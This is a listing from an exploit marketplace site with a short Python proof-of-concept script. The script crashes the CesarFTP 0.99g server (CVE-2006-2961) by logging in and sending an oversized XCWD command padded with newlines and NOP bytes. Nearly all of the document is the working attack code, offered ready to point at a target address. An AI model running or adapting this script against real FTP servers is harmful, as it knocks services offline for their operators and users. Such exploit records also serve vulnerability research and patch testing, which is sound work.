[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CesarFTP 0.99g - XCWD Denial of Service

Author
Irving Aguilar
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-25770
Category
dos / poc
Date add
19-01-2016
CVE
CVE-2006-2961
Platform
windows
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Exploit Title         : CesarFTP 0.99g -(XCWD)Remote BoF Exploit
# Discovery by              : Irving Aguilar
# Email         : im.aguilar@protonmail.ch
# Discovery Date        : 18.01.2016
# Tested Version        : 0.99g
# Vulnerability Type  : Denial of Service (DoS)
# Tested on OS          : Windows XP Professional SP3 x86 es
 
import socket
 
 
buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
target = '192.168.1.73'
port = 21
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target, port))
print '[*] Target: ' + target
print '[*] Port: ' + str(port)
s.recv(1024)
 
s.send('USER ftp\r\n')
s.recv(1024)
 
s.send('PASS ftp\r\n')
s.recv(1024)
 
s.send( buffer  + '\r\n')
print '[+] Buffer sent'
s.close()

#  0day.today [2024-09-20]  #